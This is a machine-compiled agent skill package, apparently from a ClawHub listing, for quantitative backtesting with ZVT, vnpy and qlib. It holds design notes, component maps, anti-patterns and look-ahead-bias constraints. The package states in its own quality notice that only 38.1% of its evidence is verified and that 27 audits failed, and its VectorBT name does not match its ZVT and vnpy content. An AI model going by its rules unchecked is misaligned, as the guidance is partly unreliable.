## `CW-BT-004` — Order 类型全集（Limit/Stop/OCO/Bracket）
**From**: backtrader · **Applicable to**: backtesting

backtrader 支持 Market、Limit、Stop、StopLimit、OCO（二选一）、 Bracket（止盈止损一对订单）等丰富订单类型，并模拟成交滑点和手续费方案。 zvt 回测目前主要支持市价成交，缺乏限价委托和组合订单模拟； 对于高频或实盘对接场景，完善订单类型将大幅提升回测真实性。

## `CW-BT-005` — 数据重采样与重播（Resampling & Replaying）
**From**: backtrader · **Applicable to**: backtesting

backtrader 可将低级别数据（如 1 min）实时 resample 为高级别（如 1 day）并同步驱动策略， 或 replay 逐 tick 模拟 OHLC 形成过程，实现日内精细回测。 zvt 目前多时间框架通过预录入不同级别 K 线实现，缺少运行时动态重采样； 借鉴此模式可在不重复录入数据的前提下支持任意时间粒度组合回测。

## `CW-VN-003` — CTA 回测引擎内置可视化
**From**: vnpy · **Applicable to**: backtesting

vnpy 的 cta_backtester 提供图形界面直接展示策略净值曲线、最大回撤、 每日盈亏、成交明细，无需 Jupyter Notebook。 zvt 目前回测结果可视化依赖 draw_result 方法调用 Plotly，但无统一的回测报告页面； 借鉴此模式可打包一个开箱即用的策略绩效仪表盘。

## `CW-VN-004` — vnpy.alpha ML 因子研究实验室（Lab）
**From**: vnpy · **Applicable to**: factor-research

vnpy 4.0 的 vnpy.alpha.lab 提供数据管理、模型训练、信号生成、策略回测一体化工作流， 支持 Lasso/LightGBM/MLP 等算法的标准化训练接口和可视化对比。 zvt 的 ML 能力目前仅有 MaStockMLMachine 一个入口，缺乏规范化 Lab 框架； 借鉴 Lab 模式可建立"特征工程→训练→信号→回测"的标准流水线，降低 ML 实验门槛。

## `CW-QL-001` — Point-in-Time 数据库（防未来数据泄漏）
**From**: qlib · **Applicable to**: backtesting

qlib 的 Point-in-Time Provider 保证在给定时间点 t 的查询只返回 t 时刻 真实可知的数据（财报发布延迟、修订历史均被正确处理）， 彻底消除回测中的 look-ahead bias。 zvt 目前财务数据以报告期为 timestamp，缺少"发布日"维度， 存在用未来财报数据做选股的潜在偏差；引入 PIT 模式可大幅提升回测可信度。

## `CW-QL-002` — Recorder + Experiment 实验管理（MLflow 风格）
**From**: qlib · **Applicable to**: factor-research

qlib 的 workflow 模块提供 Experiment/Recorder，自动记录每次模型训练的 超参数、特征、指标、预测结果，支持跨实验比较和模型版本管理。 zvt 目前缺乏 ML 实验追踪机制，每次重跑结果会覆盖前次； 借鉴 Recorder 模式可将每次因子实验的参数和结果持久化，支持快速复现和版本对比。

## `CW-QL-003` — Nested Decision Framework（多层嵌套决策执行）
**From**: qlib · **Applicable to**: backtesting

qlib 支持将高频执行层（分钟级委托拆单）嵌套在低频决策层（日级组合调仓）中， 两层独立优化且可组合运行，实现日内最优执行算法（如 TWAP、VWAP 调仓）。 zvt 目前回测仅有日线级别的成交假设，缺乏执行算法建模； 借鉴嵌套框架可让 zvt 区分"何时持有哪些股"与"如何以最小冲击成本建仓"两个问题。

FILE:references/components/alpha_modeling.md
# alpha_modeling (4 classes)

## `AlphaModel.fit`
`alpha_modeling/alphamodel-fit.py:0`

## `AlphaModel.predict`
`alpha_modeling/alphamodel-predict.py:0`

## `AlphaModel.detail`
`alpha_modeling/alphamodel-detail.py:0`

## `ML algorithm`
`alpha_modeling/ml-algorithm.py:0`

FILE:references/components/alpha_research_data_pipeline.md
# alpha_research_data_pipeline (4 classes)

## `AlphaDataset.add_feature`
`alpha_research_data_pipeline/alphadataset-add-feature.py:0`

## `AlphaDataset.process_data`
`alpha_research_data_pipeline/alphadataset-process-data.py:0`

## `DataProxy operators`
`alpha_research_data_pipeline/dataproxy-operators.py:0`

## `Factor library`
`alpha_research_data_pipeline/factor-library.py:0`

FILE:references/components/alpha_strategy_backtesting.md
# alpha_strategy_backtesting (6 classes)

## `BacktestingEngine.set_parameters`
`alpha_strategy_backtesting/backtestingengine-set-parameters.py:0`

## `BacktestingEngine.add_strategy`
`alpha_strategy_backtesting/backtestingengine-add-strategy.py:0`

## `BacktestingEngine.load_data`
`alpha_strategy_backtesting/backtestingengine-load-data.py:0`

## `BacktestingEngine.run_backtesting`
`alpha_strategy_backtesting/backtestingengine-run-backtesting.py:0`

## `BacktestingEngine.calculate_statistics`
`alpha_strategy_backtesting/backtestingengine-calculate-statistics.py:0`

## `Order type`
`alpha_strategy_backtesting/order-type.py:0`

FILE:references/components/charting_-_visualization.md
# charting_&_visualization (4 classes)

## `ChartWidget.add_plot`
`charting_&_visualization/chartwidget-add-plot.py:0`

## `ChartWidget.update_history`
`charting_&_visualization/chartwidget-update-history.py:0`

## `CandleItem.load_data`
`charting_&_visualization/candleitem-load-data.py:0`

## `Chart item types`
`charting_&_visualization/chart-item-types.py:0`

FILE:references/components/event-driven_core.md
# event-driven_core (6 classes)

## `EventEngine.register`
`event-driven_core/eventengine-register.py:0`

## `EventEngine.unregister`
`event-driven_core/eventengine-unregister.py:0`

## `EventEngine.put`
`event-driven_core/eventengine-put.py:0`

## `MainEngine.add_gateway`
`event-driven_core/mainengine-add-gateway.py:0`

## `MainEngine.add_app`
`event-driven_core/mainengine-add-app.py:0`

## `Event processing loop`
`event-driven_core/event-processing-loop.py:0`

FILE:references/components/market_data_gateway.md
# market_data_gateway (4 classes)

## `BaseGateway.subscribe`
`market_data_gateway/basegateway-subscribe.py:0`

## `BaseGateway.query_account`
`market_data_gateway/basegateway-query-account.py:0`

## `BaseGateway.query_position`
`market_data_gateway/basegateway-query-position.py:0`

## `Gateway implementation`
`market_data_gateway/gateway-implementation.py:0`

FILE:references/components/order_management_system.md
# order_management_system (4 classes)

## `OmsEngine.send_order`
`order_management_system/omsengine-send-order.py:0`

## `OmsEngine.cancel_order`
`order_management_system/omsengine-cancel-order.py:0`

## `OffsetConverter.convert_order_request`
`order_management_system/offsetconverter-convert-order-request.py:0`

## `Position mode`
`order_management_system/position-mode.py:0`

FILE:references/components/persistence_layer.md
# persistence_layer (4 classes)

## `BaseDatabase.save_bar_data`
`persistence_layer/basedatabase-save-bar-data.py:0`

## `BaseDatabase.load_bar_data`
`persistence_layer/basedatabase-load-bar-data.py:0`

## `AlphaLab.get_bar_data`
`persistence_layer/alphalab-get-bar-data.py:0`

## `Database backend`
`persistence_layer/database-backend.py:0`

FILE:references/components/rpc_communication.md
# rpc_communication (5 classes)

## `RpcServer.register`
`rpc_communication/rpcserver-register.py:0`

## `RpcServer.start`
`rpc_communication/rpcserver-start.py:0`

## `RpcClient.start`
`rpc_communication/rpcclient-start.py:0`

## `RpcClient.callback`
`rpc_communication/rpcclient-callback.py:0`

## `Transport protocol`
`rpc_communication/transport-protocol.py:0`

FILE:references/components/ui_application_layer.md
# ui_application_layer (4 classes)

## `MainWindow.createDockWidget`
`ui_application_layer/mainwindow-createdockwidget.py:0`

## `BaseMonitor.process_event`
`ui_application_layer/basemonitor-process-event.py:0`

## `OrderMonitor.cancel_all`
`ui_application_layer/ordermonitor-cancel-all.py:0`

## `Display theme`
`ui_application_layer/display-theme.py:0`

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Vectorbt Vectorized

Skill

基于 VectorBT 框架的向量化回测与因子研究工具，支持多市场数据批量回测、策略参数优化和统计套利分析。

---
name: vectorbt-vectorized
description: |-
  基于 VectorBT 框架的向量化回测与因子研究工具，支持多市场数据批量回测、策略参数优化和统计套利分析。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-092"
  compiled_at: "2026-04-22T13:00:39.474430+00:00"
  capability_markets: "multi-market"
  capability_activities: "backtesting, factor-research"
  sop_version: "crystal-compilation-v6.1"
---
# VectorBT 向量回测 (vectorbt-vectorized)

> 基于 VectorBT 框架的向量化回测与因子研究工具，支持多市场数据批量回测、策略参数优化和统计套利分析。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (23 total)

### Auto-generate API Documentation (`UC-101`)
Automatically generate API documentation in Markdown format from Python source code to maintain consistent and up-to-date documentation
**Triggers**: api, documentation, generate

### Update MkDocs Navigation (`UC-102`)
Automatically update the navigation structure in mkdocs.yml based on the actual API documentation files present in the docs directory
**Triggers**: navigation, mkdocs, api

### Bitcoin Daily MACD Trading Strategy (`UC-103`)
Execute a daily MACD (Moving Average Convergence Divergence) crossover strategy on Bitcoin to identify buy and sell signals based on momentum
**Triggers**: bitcoin, BTC, MACD

For all **23** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (25 total)

- **`AP-ZVT-183`**: 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败
- **`AP-ZVT-179`**: 第三方数据接口超限后异常被吞噬，数据静默缺失
- **`AP-ZVT-183B`**: HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移

All 25 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-092. Evidence verify ratio = 38.1% and audit fail total = 27. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 25 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-092` blueprint at 2026-04-22T13:00:39.474430+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Bitcoin Daily MACD Trading Strategy', 'Update MkDocs Navigation', 'Auto-generate API Documentation', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **25**

## qlib (9)

### `AP-QLIB-1930` — 回测结果与模型无关——共享 dataset 对象导致预测值被首次模型覆盖 <sub>(high)</sub>

Qlib 中多个模型复用同一个已 fit 的 DatasetH 实例时，dataset 内部的标准化 参数（fit_start_time/fit_end_time 决定的归一化统计量）在第一次 fit 后固化。 切换模型但不重新初始化 dataset，导致所有模型实际使用同一套预测信号。表现为 无论换 LightGBM/XGBoost/DNN，回测净值曲线完全一致。这是最危险的"实验看起来 在跑，但结论全部无效"反模式。

Source: https://github.com/microsoft/qlib/issues/1930

### `AP-QLIB-2090` — fit_start_time 与 train segment 双重配置引发隐式数据泄露 <sub>(high)</sub>

Qlib DatasetH 有两个"训练数据范围"：handler 的 fit_start_time/fit_end_time （决定归一化器拟合范围）和 segments.train（决定模型训练范围）。常见错误是 让 fit_end_time 覆盖 valid/test 段，使归一化统计量（均值、标准差）包含了 未来数据，造成前向偏差（look-ahead bias）。两者独立配置但语义耦合，文档 未明确说明 fit_end_time 必须 <= train_end。

Source: https://github.com/microsoft/qlib/issues/2090

### `AP-QLIB-2036` — MACD 因子公式文档错误——DEA 被多除一次 CLOSE 导致量纲不一致 <sub>(high)</sub>

Qlib 官方文档中的 Alpha 公式示例将 MACD 的 DEA 定义为 EMA(DIF, 9) / CLOSE， 但 DIF 已经是无量纲（除过 CLOSE 的），再次除以 CLOSE 导致 DEA 量纲为 1/price。 基于此文档公式构建的 MACD 因子在截面标准化后与正确公式差异显著，IC 下降。 此类文档层面的公式错误会被大量用户直接照搬入生产因子库。

Source: https://github.com/microsoft/qlib/issues/2036

### `AP-QLIB-2184` — 自定义 A 股数据导入前未按约定填充停牌日 NaN，引发下游因子噪声 <sub>(high)</sub>

Qlib 约定停牌日 open/close/high/low/volume/factor 字段均应填 NaN，以便框架 在因子计算时识别并跳过。用户自建 A 股数据集时若将停牌日保留为上一日价格 （常见于从东财/Wind 直接导出的数据），会导致停牌期间的价格动量因子出现 "假信号"（价格不变但因子非零）。Qlib 不校验此约定，错误静默流入训练数据。

Source: https://github.com/microsoft/qlib/issues/2184

### `AP-QLIB-1892` — PIT（Point-In-Time）财务数据收集器依赖外部股票列表接口，全量 A 股获取不完整 <sub>(high)</sub>

Qlib 的 PIT 数据收集器（财务数据时间点快照）在初始化时调用 get_hs_stock_symbols() 获取沪深股票列表。该函数依赖东财 API，经常仅返回 部分列表而非全量 5000+ 股票，且函数在获取不完整时直接 raise ValueError。 用户若按文档步骤操作，财务数据集将只覆盖部分股票，基于 PIT 财务因子的回测 存在严重生存者偏差（未被采集的股票被隐式排除）。

Source: https://github.com/microsoft/qlib/issues/1892

### `AP-QLIB-2097` — 全市场 instrument="all" 在 32GB 内存机器上 OOM，但 CSI300 正常 <sub>(medium)</sub>

Qlib 在加载 Alpha158 特征时会将指定 universe 的全部特征矩阵一次性载入内存。 使用 instrument="csi300"（300 股）与 instrument="all"（5000+ 股）的内存占用 差约 16 倍。32GB 机器跑全市场时在 init_instance_by_config 阶段直接 OOM， 错误信息不提示内存问题。用户容易误以为是配置错误，实际上需要分批加载或 使用流式特征计算。

Source: https://github.com/microsoft/qlib/issues/2097

### `AP-QLIB-1984` — LightGBM 模型标签维度校验逻辑永远不触发导致多标签训练静默失败 <sub>(medium)</sub>

Qlib gbdt.py 中用 y.values.ndim == 2 判断是否为多标签，但从 DataFrame 取出的 Series 的 ndim 永远为 1，条件永远为 False，因此多标签训练不会走 squeeze 分支，而是直接进入 LightGBM 训练并在更深处抛出语义不明的错误。 用户尝试自定义多标签任务时无法从错误信息定位到此根因。

Source: https://github.com/microsoft/qlib/issues/1984

### `AP-QLIB-1915` — 自定义 CSV 数据 dump_bin 后 DataHandler 报 Length mismatch，D.features 却正常 <sub>(high)</sub>

Qlib 存在两套数据访问路径：D.features（直接读 binary）和 DataHandler/DataHandlerLP （带 processor pipeline）。自定义 A 股 CSV 数据在 dump_bin 时若字段顺序 或 symbol 格式（如 600000.SH vs SH600000）与 Qlib 约定不符，DataHandler 的 processor 在 align/reindex 时触发 Length mismatch，而 D.features 因不 经过 processor 而成功。这一"两套路径行为不一致"让用户误以为数据已正确导入。

Source: https://github.com/microsoft/qlib/issues/1915

### `AP-QLIB-1949` — Colab/Linux 多进程后端与 Qlib ParallelExt 冲突导致 DataHandler 完全不可用 <sub>(medium)</sub>

Qlib 在非 fork 环境（Windows 或 Google Colab）中，DataHandler 使用 joblib 并行加载特征时，ParallelExt 初始化时访问 _backend_args 属性失败（AttributeError）。 根因是 joblib 1.5+ 移除了该内部属性，Qlib 的兼容层未更新。表现为 D.features 调用抛出多层嵌套异常，用户无法从错误栈判断是并行后端问题还是数据问题。

Source: https://github.com/microsoft/qlib/issues/1949

## vnpy (4)

### `AP-VNPY-3691` — K 线生成器首根 K 线时间戳不对齐，导致第一个周期信号错误 <sub>(high)</sub>

vnpy BarGenerator 在合成 N 分钟 K 线时，第一根推送的 K 线时间戳为"当前 tick 所在分钟"而非"完整 N 分钟周期结束时间"。具体表现：09:59 的 tick 会 触发一根不完整的 5 分钟 K 线推送（本应等到 10:04 才推送）。策略若在 on_bar 中直接用 datetime.minute % 5 过滤，第一根 K 线恰好通过，但包含的 数据不足一个完整周期，用于信号计算会产生错误的开仓信号。

Source: https://github.com/vnpy/vnpy/issues/3691

### `AP-VNPY-3669` — Alpha 模块历史数据增量保存时新旧 DataFrame schema 不兼容导致 SchemaError <sub>(medium)</sub>

vnpy Alpha 模块在保存 K 线数据到 Parquet 文件时，将新下载数据（可能含 Float64 列）与已存文件（历史 Int64 列）直接 polars.concat。polars 强类型 不允许隐式类型提升，抛出 SchemaError。根因是不同数据源/版本返回的字段类型 不一致（如 volume 在部分行情源为整数，在另一些为浮点），且 concat 前无 schema 对齐步骤。影响所有使用 vnpy alpha 进行回测的历史数据构建流程。

Source: https://github.com/vnpy/vnpy/issues/3669

### `AP-VNPY-3685` — 价差交易模块 run_backtesting() 在 Jupyter 环境下静默报错，结果不可信 <sub>(high)</sub>

vnpy 4.10 价差交易（SpreadTrading）模块的 run_backtesting() 在 Jupyter 环境下存在事件循环冲突（asyncio already running），导致回测引擎部分逻辑 不执行但不抛异常，返回看似正常的回测统计数据。同样代码在命令行 Python 中无此问题。vnpy 4.x 将部分 IO 改为 async 但 Jupyter 的事件循环与之不兼容， 是"回测结果看起来正确但实际不完整"的隐蔽陷阱。

Source: https://github.com/vnpy/vnpy/issues/3685

### `AP-VNPY-3700` — 安装脚本不使用 venv 导致全局 numpy 版本被降级破坏其他依赖 <sub>(medium)</sub>

vnpy install.bat 直接在系统/conda base 环境安装，会强制降级 numpy 到 <2.0 以满足 vnpy 依赖，破坏依赖 numpy 2.x 的其他量化工具（如 scipy、pytorch 新版）。 没有 requirements.txt，依赖边界不透明。在多工具共存的量化研究环境中， vnpy 的安装脚本是"全局环境污染"的常见根源。

Source: https://github.com/vnpy/vnpy/issues/3700

## zipline (6)

### `AP-ZIPLINE-138` — 回测价格为未复权价，教程图表误导用户误判策略收益 <sub>(high)</sub>

Zipline 教程使用 AAPL 股价图做演示，但 bundle 中存储的是未复权价格（raw price）， 而非经过拆股/分红调整的复权价。图表显示的历史价格与市场实际价约差 4 倍（Apple 历次拆股累计因子），用户误将"价格翻 4 倍"当作策略收益。A 股场景更严重： 除权前后价格跳变会在未复权数据中形成巨大"信号"，吸引技术指标在除权日产生 虚假突破信号。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/138

### `AP-ZIPLINE-235` — 默认以当根 K 线收盘价成交，低估实盘滑点，策略回测收益虚高 <sub>(high)</sub>

Zipline 默认滑点模型在当根 K 线触发信号后，以同根 K 线收盘价成交（current bar close fill）。实盘中信号只能在下一根 K 线的开盘价附近成交（T+1 order execution）。以 A 股日线为例，用收盘价回测比用次日开盘价成交平均高估日收益 约 0.1-0.3%，年化差距可超 30%。需显式配置 slippage model 为 VolumeShareSlippage 或 FixedSlippage 并设合理 volume_limit。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/235

### `AP-ZIPLINE-190` — 日历 start_session 设为非交易日触发 DateOutOfBounds，无提示如何修正 <sub>(medium)</sub>

Zipline 在注册 bundle 或运行算法时，若 start_session 参数恰好是非交易日 （如 1998-01-01 元旦），Calendar 校验抛出 DateOutOfBounds（"cannot be earlier than the first session"）。错误信息仅显示交易日历起始日，不提示"请改为第一个 交易日"。A 股场景：使用 SSE/SZSE 日历时，若 start_date 恰好是春节前最后 一天次日（节假日），会触发同类错误，调试成本极高。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/190

### `AP-ZIPLINE-181` — asset db 过期后 Pipeline 报"no assets traded"，误导用户排查数据范围 <sub>(high)</sub>

Zipline 的 asset database（SQLite）记录每只股票的 start/end 交易日期。若 使用了旧版 Quandl/自建 bundle 且未重新 ingest，在回测新日期范围时 Pipeline 抛出 "Failed to find any assets with country_code 'US' that traded between [dates]"。A 股场景：重新下载行情后若只更新价格数据而未重建 asset db，退市/ 新上市股票的日期范围不更新，Pipeline 过滤会悄悄排除这些股票，产生生存者偏差。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/181

### `AP-ZIPLINE-285` — week_start()/week_end() 在自定义日历（非美股）下静默失效 <sub>(medium)</sub>

Zipline schedule_function 的 date_rules.week_start() 和 date_rules.week_end() 依赖交易日历的周首/周末判断逻辑，但在非美股日历（如 ASX、SSE）中，该逻辑 与 NYSE 日历的偏移计算不兼容，导致 schedule 永远不触发或在错误的日期触发。 A 股场景：使用 SSE 日历时，含春节等连续长假的周，week_start 可能跳过整个 假期周而不调仓，但用户无法从日志发现未触发的调度。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/285

### `AP-ZIPLINE-240` — 回测日期时区必须为 UTC，传入 naive datetime 引发深层 AssertionError <sub>(medium)</sub>

Zipline 内部强制要求所有时间戳为 UTC aware datetime。当用户传入 naive datetime （无时区信息，如 pd.Timestamp('2020-01-01')）时，不在入口处报错，而是在 算法执行深处触发 AssertionError: Algorithm should have a utc datetime，栈深 难以定位。A 股开发者从本地 CST 时间导入数据时极易触发此陷阱，需在 bundle 注册时显式 tz_localize('UTC')。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/240

## zvt (6)

### `AP-ZVT-183` — 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败 <sub>(high)</sub>

ZVT 在计算前复权因子时以 new/old 价格比计算 qfq_factor。当 old==0（新股首日 或数据缺失）时因子为 inf；当 kdata.open 本身为 None（停牌日未填充）时乘法 抛出 TypeError。结果：整个 entity 的复权计算中断，后续 K 线全部丢失，但主 流程只 log ERROR 不中断，用户往往不知道已有大量股票数据损坏。

Source: https://github.com/zvtvz/zvt/issues/183

### `AP-ZVT-179` — 第三方数据接口超限后异常被吞噬，数据静默缺失 <sub>(high)</sub>

ZVT 使用聚宽 jqdatasdk 批量拉取全市场 K 线时（4000+ 股票），触发聚宽每日 最大查询条数限制（错误：已超过每日最大查询数量）。ZVT 捕获异常后继续执行下一 entity，导致超限后所有股票的当日数据均静默缺失。回测若使用该残缺数据库，因 子计算结果将产生系统性偏差，且无告警。

Source: https://github.com/zvtvz/zvt/issues/179

### `AP-ZVT-161` — 全市场 SQLite 批量因子计算触发 too many SQL variables 错误 <sub>(medium)</sub>

ZVT 在计算 VolumeUpMaFactor 等多股因子时，将所有 entity_id 拼入单条 SQL 的 IN 子句。当 A 股全市场（5000+ 股）一次性查询时，触发 SQLite 默认限制 SQLITE_MAX_VARIABLE_NUMBER=999。调大 max_allowed_packet（MySQL 参数）无效， 根因是 SQLite 变量数上限。正确解法是分批查询，但 ZVT 早期版本未处理此边界。

Source: https://github.com/zvtvz/zvt/issues/161

### `AP-ZVT-129` — 使用通配符导入隐藏 API 版本变更，AdjustType 等枚举莫名消失 <sub>(medium)</sub>

ZVT 文档示例使用 `from zvt import *` 导入所有符号。当 ZVT 版本升级重构 枚举（如将 AdjustType 移入子模块）后，通配符导入不再包含该符号，触发 AttributeError。使用者误以为是安装问题，实际是版本间 API breaking change 未在 CHANGELOG 中标注，且通配符导入掩盖了具体来源。应显式 import 枚举类。

Source: https://github.com/zvtvz/zvt/issues/129

### `AP-ZVT-187` — 回测引擎未在数据层空结果时提前终止，导致空指针级联崩溃 <sub>(medium)</sub>

ZVT Trader 在 load_data 完成后检查数据为空时，不提前退出，而是将空 DataFrame 传入 selector 计算，触发后续 NoneType 操作链式崩溃。错误栈深且难以定位根因， 用户误以为是策略逻辑问题。根因是数据时间窗口配置错误（start/end 不在数据 库覆盖范围内）但无有效校验。

Source: https://github.com/zvtvz/zvt/issues/187

### `AP-ZVT-183B` — HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移 <sub>(high)</sub>

ZVT 提供 Stock1dKdata（不复权）、Stock1dHfqKdata（后复权）、Stock1dQfqKdata （前复权）三张独立表。用户在计算价格动量/均线因子时混用两张表（如用不复权 做均线，用后复权做收益率），导致除权日前后因子值产生跳变。ZVT 不做跨表 复权类型一致性校验，混用静默通过。

Source: https://github.com/zvtvz/zvt/issues/183

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-092--vectorbt
**Scan date**: 2026-04-22
**Stats**: {'total_files': 7, 'total_classes': 34, 'total_functions': 0, 'total_stages': 7}

## Modules (7)

- [data_ingestion](components/data_ingestion.md): 5 classes
- [technical_indicators](components/technical_indicators.md): 5 classes
- [signal_generation](components/signal_generation.md): 4 classes
- [portfolio_simulation](components/portfolio_simulation.md): 6 classes
- [records_and_event_analysis](components/records_and_event_analysis.md): 5 classes
- [performance_metrics_and_returns](components/performance_metrics_and_returns.md): 5 classes
- [statistics_and_plotting](components/statistics_and_plotting.md): 4 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 140
  fatal_constraints_count: 70
  non_fatal_constraints_count: 180
  use_cases_count: 23
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (39)

- **`SHARED-BT-LAB-001`** <sub>(fatal)</sub>: 未来函数（Lookahead Bias）：在模拟历史时间点 t 的交易决策时， 不得使用 t 时刻之后才能知道的信息。最常见形式： (1) 使用收盘价计算信号并同日以收盘价成交； (2) 将 T 日收盘后计算的指标标记在同一根 K 线； (3) 使用当日最高/最低价作为成交假设。 信号计算与成交时间必须对齐：T 日收盘后计算信号，T+1 日开盘成交。
- **`SHARED-BT-LAB-002`** <sub>(high)</sub>: 指标预热期（Warmup Period）处理：滚动窗口指标在前 N 个 bar 时 NaN， 这些 bar 不应参与信号计算和持仓决策。强制要求指标的 warmup_period 与最长 lookback 期等长，且 warmup 期间持仓应置零。
- **`SHARED-BT-LAB-003`** <sub>(fatal)</sub>: ML/DL 模型时序数据划分必须按时间顺序：TRAIN < VALID < TEST， 不可使用随机 k-fold 分折（会将未来数据混入训练集）。 应使用 TimeSeriesSplit 或 Walk-Forward 验证。
- **`SHARED-BT-LAB-004`** <sub>(fatal)</sub>: 开盘价/最高价/最低价成交假设：日线回测中假设每日可以最高价卖出或 最低价买入（如动量策略"最高价止盈"），这是明显的 lookahead， 因为日内最高/最低价只有收盘后才能确认。成交价只能用开盘价或 前一日收盘价（带滑点）。
- **`SHARED-BT-LAB-005`** <sub>(high)</sub>: 数据对齐偏移（Off-by-one）：pandas rolling/shift 等操作容易引入细微的 1 期偏移错误。应在代码中明确记录每个序列的"观测时间点"， 并通过 assert 验证关键时间对齐关系。
- **`SHARED-BT-LAB-006`** <sub>(high)</sub>: 过度优化（Overfitting）：回测数量越多，过拟合概率越高。 Bailey et al.（2014）证明 Optimal Sharpe Ratio 期望值随回测次数单调递减。 应使用 Walk-Forward 验证代替 in-sample 参数穷举，并报告 Deflated Sharpe Ratio（DSR）而非峰值 Sharpe。
- **`SHARED-BT-SURV-001`** <sub>(fatal)</sub>: 幸存者偏差（Survivorship Bias）：使用当前市场成分股作为历史回测股票池， 会遗漏曾经存在但后来退市、摘牌或被合并的股票，系统性高估策略历史收益率。 回测股票池必须使用历史时点快照（point-in-time universe）。
- **`SHARED-BT-SURV-002`** <sub>(high)</sub>: In-Sample / Out-of-Sample 划分：策略开发、参数选择必须在样本内完成， 样本外数据仅用于最终验证，不可多次"看"样本外数据后继续调优 （会将样本外变为新的样本内，重蹈过拟合）。
- **`SHARED-BT-SURV-003`** <sub>(high)</sub>: 停牌/缺失数据的填充策略：停牌日价格不可简单用前一日收盘价 forward-fill， 因为这会在复盘时造成"零成交量"日参与了因子计算和信号生成。 应在因子计算层显式过滤缺失交易日，不填充。
